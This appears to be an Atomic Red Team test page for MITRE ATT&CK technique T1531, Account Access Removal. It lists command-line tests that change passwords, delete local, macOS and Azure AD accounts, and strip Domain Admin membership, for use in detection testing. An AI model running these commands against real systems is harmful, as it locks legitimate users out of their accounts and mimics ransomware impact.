# T1531 - Account Access Removal

## Description from ATT&CK

> Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials, revoked permissions for SaaS platforms such as Sharepoint) to remove access to accounts.(Citation: Obsidian Security SaaS Ransomware June 2023) Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
> 
> In Windows, [Net](https://attack.mitre.org/software/S0039) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. Accounts could also be disabled by Group Policy. In Linux, the <code>passwd</code> utility may be used to change passwords. On ESXi servers, accounts can be removed or modified via esxcli (`system account set`, `system account remove`).
> 
> Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.

[Source](https://attack.mitre.org/techniques/T1531)

## Atomic Tests

- [Atomic Test #1: Change User Password - Windows](#atomic-test-1-change-user-password---windows)
- [Atomic Test #2: Delete User - Windows](#atomic-test-2-delete-user---windows)
- [Atomic Test #3: Remove Account From Domain Admin Group](#atomic-test-3-remove-account-from-domain-admin-group)
- [Atomic Test #4: Change User Password via passwd](#atomic-test-4-change-user-password-via-passwd)
- [Atomic Test #5: Delete User via dscl utility](#atomic-test-5-delete-user-via-dscl-utility)
- [Atomic Test #6: Delete User via sysadminctl utility](#atomic-test-6-delete-user-via-sysadminctl-utility)
- [Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell](#atomic-test-7-azure-ad---delete-user-via-azure-ad-powershell)
- [Atomic Test #8: Azure AD - Delete user via Azure CLI](#atomic-test-8-azure-ad---delete-user-via-azure-cli)

### Atomic Test #1: Change User Password - Windows

Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
the password "HuHuHUHoHo283283".

**Supported Platforms:** Windows

**auto_generated_guid:** `1b99ef28-f83c-4ec5-8a08-1a56263a5bb2`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_account | User account whose password will be changed. | string | AtomicAdministrator|
| new_user_password | Password to use if user account must be created first | string | User2ChangePW!|
| new_password | New password for the specified account. | string | HuHuHUHoHo283283@dJD|

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}
```

#### Cleanup Commands

```cmd
net.exe user #{user_account} /delete >nul 2>&1
```
### Atomic Test #2: Delete User - Windows

Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.

**Supported Platforms:** Windows

**auto_generated_guid:** `f21a1d7d-a62f-442a-8c3a-2440d43b19e5`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_user_password | Password to use if user account must be created first | string | User2DeletePW!|
| user_account | User account to be deleted. | string | AtomicUser|

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /delete
```

### Atomic Test #3: Remove Account From Domain Admin Group

This test will remove an account from the domain admins group

**Supported Platforms:** Windows

**auto_generated_guid:** `43f71395-6c37-498e-ab17-897d814a0947`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| super_user | Account used to run the execution command (must include domain). | string | domain&#92;super_user|
| super_pass | super_user account password. | string | password|
| remove_user | Account to remove from domain admins. | string | remove_user|

#### Attack Commands: Run with `powershell`!

```powershell
$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
  Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
    write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}
```


#### Dependencies: Run with `powershell`!

##### Description: Requires the Active Directory module for powershell to be installed.

###### Check Prereq Commands

```powershell
if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
```

###### Get Prereq Commands

```powershell
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
```

### Atomic Test #4: Change User Password via passwd

This test changes the user password to hinder access to the account using passwd utility.

**Supported Platforms:** macOS, Linux

**auto_generated_guid:** `3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_account | User account whose password will be changed. | string | ARTUser|

#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
passwd #{user_account} #enter admin password > enter new password > confirm new password
```

### Atomic Test #5: Delete User via dscl utility

This test deletes the user account using the dscl utility.

**Supported Platforms:** macOS

**auto_generated_guid:** `4d938c43-2fe8-4d70-a5b3-5bf239aa7846`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_account | User account which will be deleted. | string | ARTUser|
| user_password | User password. | string | ARTPassword|

#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
dscl . -delete /Users/#{user_account} #enter admin password
```

#### Cleanup Commands

```sh
dscl . -create /Users/#{user_account} #enter admin password
dscl . -create /Users/#{user_account} UserShell /bin/bash
dscl . -create /Users/#{user_account} UniqueID 503
dscl . -create /Users/#{user_account} NFSHomeDirectory /Users/#{user_account}
dscl . -passwd /Users/#{user_account} #{user_password} #enter password for new user
```
### Atomic Test #6: Delete User via sysadminctl utility

This test deletes the user account using the sysadminctl utility.

**Supported Platforms:** macOS

**auto_generated_guid:** `d3812c4e-30ee-466a-a0aa-07e355b561d6`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_account | User account which will be deleted. | string | ARTUserAccount|
| user_name | New user name. | string | ARTUser|
| user_password | New user password. | string | ARTPassword|

#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

```sh
sysadminctl -deleteUser #{user_account} #enter admin password
```

#### Cleanup Commands

```sh
sysadminctl -addUser #{user_account} -fullName "#{user_name}" -password #{user_password}
```
### Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell

Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.

**Supported Platforms:** Azure-ad

**auto_generated_guid:** `4f577511-dc1c-4045-bcb8-75d2457f01f4`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| userprincipalname | User principal name (UPN) for the Azure user being deleted | string | atomicredteam@yourdomain.com|

#### Attack Commands: Run with `powershell`!

```powershell
Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalname
```

#### Cleanup Commands

```powershell
N/A
```

#### Dependencies: Run with `powershell`!

##### Description: Check if AzureAD PowerShell module is installed

###### Check Prereq Commands

```powershell
Get-InstalledModule -Name AzureAD
```

###### Get Prereq Commands

```powershell
echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
```

##### Description: Check if AzureAD PowerShell module is installed

###### Check Prereq Commands

```powershell
Update the input arguments so the userprincipalname value is accurate for your environment
```

###### Get Prereq Commands

```powershell
echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
```

### Atomic Test #8: Azure AD - Delete user via Azure CLI

Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.

**Supported Platforms:** Azure-ad

**auto_generated_guid:** `c955c1c7-3145-4a22-af2d-63eea0d967f0`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| userprincipalname | User principal name (UPN) for the Azure user being deleted | string | atomicredteam@yourdomain.com|

#### Attack Commands: Run with `powershell`!

```powershell
az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalname
```

#### Cleanup Commands

```powershell
N/A
```

#### Dependencies: Run with `powershell`!

##### Description: Check if Azure CLI is installed and install manually

###### Check Prereq Commands

```powershell
az account list
```

###### Get Prereq Commands

```powershell
echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
```

##### Description: Check if Azure CLI is installed and install via PowerShell

###### Check Prereq Commands

```powershell
az account list
```

###### Get Prereq Commands

```powershell
echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
```

##### Description: Update the userprincipalname to meet your requirements

###### Check Prereq Commands

```powershell
Update the input arguments so the userprincipalname value is accurate for your environment
```

###### Get Prereq Commands

```powershell
echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
```